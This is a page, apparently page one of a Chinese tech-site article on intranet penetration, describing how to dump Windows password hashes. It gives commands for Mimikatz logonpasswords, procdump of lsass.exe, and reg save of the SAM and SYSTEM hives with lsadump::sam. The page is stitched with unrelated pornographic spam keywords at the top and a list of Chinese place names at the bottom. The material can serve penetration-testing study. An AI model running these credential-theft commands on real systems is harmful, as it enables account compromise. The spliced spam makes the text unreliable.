高加索AV无码,99尹人网毛,韩日337p99,一级a片久久无,97色区综合,激情日韩在线一二三,日韩精品久久精品草比,婷婷久久91,亚洲天堂艹比

侵權(quán)投訴
訂閱
糾錯
加入自媒體

內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)

1、直接讀取

Mimikatz讀取明文密碼和hash時需要管理員權(quán)限。

privilege::debug           //提升至debug權(quán)限

sekurlsa::logonpasswords   //抓取密碼

image.png

image.png

2、Procdump+Mimikatz離線讀取lsass.dmp文件

Procdump是微軟官方發(fā)布的工具,可以用來將目標lsass文件導(dǎo)出。先在目標機器上上傳Procdump,導(dǎo)出lsass.dmp

procdump64.exe-accepteula-ma

lsass.exe lsass.dmp

image.png

image.png

將目標機上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:

sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中

sekurlsa::logonpasswords full    //獲取密碼

3、通過SAM和System文件抓取密碼和Hash

首先利用注冊表命令將目標機的sam或者system文件導(dǎo)出

reg save hklmsam sam.hive

reg save hklmsystem system.hive

image.png

然后將目標機上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:

token::elevate

lsadump::sam

image.png

image.png

<上一頁  1  2  3  下一頁>  
聲明: 本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權(quán)或其他問題,請聯(lián)系舉報。

發(fā)表評論

0條評論,0人參與

請輸入評論內(nèi)容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗證碼繼續(xù)

暫無評論

暫無評論

    安防 獵頭職位 更多
    文章糾錯
    x
    *文字標題:
    *糾錯內(nèi)容:
    聯(lián)系郵箱:
    *驗 證 碼:

    粵公網(wǎng)安備 44030502002758號

    建瓯市| 通州区| 临海市| 天峨县| 青川县| 扶沟县| 德惠市| 台北县| 蓬莱市| 苗栗市| 桑植县| 五原县| 岑溪市| 兴海县| 文水县| 海林市| 扶绥县| 旺苍县| 旬邑县| 疏附县| 博客| 武宁县| 盐亭县| 裕民县| 江阴市| 永州市| 灌阳县| 磐安县| 和林格尔县| 昆山市| 陇西县| 稻城县| 桐城市| 武强县| 弥勒县| 石首市| 辉南县| 荔波县| 包头市| 青海省| 双辽市|